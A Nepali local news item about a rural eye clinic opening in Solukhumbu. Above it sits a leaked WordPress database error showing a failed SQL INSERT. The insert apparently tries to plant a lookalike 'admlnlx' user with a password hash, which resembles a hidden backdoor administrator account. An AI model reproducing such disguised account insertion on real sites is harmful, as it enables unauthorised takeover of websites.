WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfhaKhyFRgknfoJuVPaGAmcrdUSIEq0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 11:16:09', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, सोलुखुम्बु । सोलुखुम्बु जिल्लाको माप्य दूधकोशी गाउपालिकामा आँखा क्लिनिक सञ्चालमा गरिएको छ । माप्य दुधकोशी गाउँपालिका, तिलगंगा आँखा प्रतिष्ठान र सामुदायिक आँखा केन्द्र सोलुखुम्बुको सहकार्यमा माप्यदुधकोशी ग्रामीण आँखा क्लिनिक सुरु गरिएको हो ।
हिजो (बुधबार) एक कार्यक्रमा बीच आँखा क्लिनिकको शुभारम्भ गरिएको हो । कार्यक्रममा गाउपालिका अध्यक्ष बुद्धि किरण राई ले ग्रामीण जनताको स्वास्थ्यलाई ध्यानमा राखेर गाउँमै स्वास्थ्य सेवा उपलब्ध गराउनु भएकोमा तिलगंगा आँखा केन्द्रले निकै राम्रो काम गरेको बताए ।
कार्यक्रममा तिलगंगा आँखा केन्द्र का भोजराज पोख्रेल, आख केन्द्र फाप्लु का अध्यक्ष ङिमा तेन्डुप शेर्पा, स्थानीय जनप्रतिनिधिहरुको उपस्थिति रहेको थियो ।